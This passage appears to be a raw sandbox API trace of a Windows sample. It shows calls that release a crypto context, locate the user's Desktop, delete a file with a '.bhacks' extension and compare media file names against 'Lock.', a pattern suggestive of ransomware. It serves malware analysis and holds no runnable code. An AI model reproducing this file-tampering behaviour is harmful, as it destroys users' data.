wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0105.096] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0105.096] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0105.096] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0105.096] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0105.096] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0105.096] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0105.096] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0105.096] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0105.096] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0105.096] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0105.097] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.097] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0105.097] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.097] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0105.097] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.097] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.097] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0105.097] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.097] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0105.097] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.097] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.097] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.097] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.097] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0105.097] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0105.097] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0105.097] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0105.097] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0105.097] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.097] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0105.097] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0105.097] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0105.097] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0105.097] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0105.097] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0105.098] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0105.098] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0105.098] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0105.098] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0105.098] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0105.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0105.098] CryptReleaseContext (hProv=0x9be918, dwFlags=0x0) returned 1 [0105.098] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.098] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0105.098] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0105.098] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0105.098] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0105.098] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0105.098] FreeLibrary (hLibModule=0x76390000) returned 1 [0105.098] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.098] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.098] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.098] CloseHandle (hObject=0x44c) returned 1 [0105.100] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.100] CloseHandle (hObject=0x458) returned 1 [0105.176] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.177] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0105.177] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0105.177] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0105.177] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Tab3I0y Y3.avi.bhacks", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Tab3I0y Y3.avi.bhacks", lpFilePart=0x8cedf4*="Tab3I0y Y3.avi.bhacks") returned 0x2e [0105.177] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tab3I0y Y3.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\tab3i0y y3.avi.bhacks")) returned 0x20 [0105.177] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tab3I0y Y3.avi.bhacks", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24f82a07, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x24f82a07, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x251263f5, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x7be0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Tab3I0y Y3.avi.bhacks", cAlternateFileName="TAB3I0~1.BHA")) returned 0x9a3b80 [0105.177] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tab3I0y Y3.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\tab3i0y y3.avi.bhacks")) returned 1 [0105.312] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24f82a07, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x24f82a07, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x251263f5, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x7be0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Tab3I0y Y3.avi.bhacks", cAlternateFileName="TAB3I0~1.BHA")) returned 0 [0105.312] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0105.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75678 | out: hHeap=0x2af0000) returned 1 [0105.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0105.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0105.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0105.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0105.312] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0105.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0105.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0105.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0105.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0105.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0105.312] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0105.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0105.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0105.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0105.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0105.313] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0105.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0105.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0105.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0105.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0105.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0105.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92f8 [0105.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0105.313] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0105.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0105.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6488 [0105.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0105.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0105.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0105.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0105.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0105.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0105.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0105.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0105.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0105.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0105.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0105.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0105.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0105.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0105.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75fd8 [0105.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6488 | out: hHeap=0x2af0000) returned 1 [0105.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0105.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0105.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0105.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0105.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0105.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0105.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0105.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0105.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0105.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0105.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0105.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0105.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0105.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0105.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0105.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0105.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0105.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0105.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0105.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5e) returned 0x2a68440 [0105.314] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Tab3I0y Y3.avi.bhacks", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Tab3I0y Y3.avi.bhacks", lpFilePart=0x8cf650*="Tab3I0y Y3.avi.bhacks") returned 0x2e [0105.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0105.314] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Tab3I0y Y3.avi.bhacks" (normalized: "c:\\users\\fd1hvy\\desktop\\tab3i0y y3.avi.bhacks")) returned 0xffffffff [0105.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75fd8 | out: hHeap=0x2af0000) returned 1 [0105.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0105.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0105.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0105.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0105.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0105.315] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0105.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0105.315] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0105.315] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0105.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0105.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0105.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0105.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0105.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0105.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0105.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0105.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0105.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0105.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0105.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0105.315] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0105.315] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0105.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TtFu8ac2GuQ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0105.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tFu8ac2GuQ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0105.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fu8ac2GuQ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0105.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u8ac2GuQ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0105.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ac2GuQ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0105.315] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ac2GuQ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0105.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c2GuQ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0105.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2GuQ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0105.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GuQ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0105.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uQ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0105.316] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0105.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0105.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0105.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0105.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0105.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0105.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0105.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0105.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0105.316] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0105.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0105.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0105.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0105.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0105.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0105.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0105.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0105.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0105.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0105.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0105.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0105.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0105.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0105.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0105.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0105.316] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 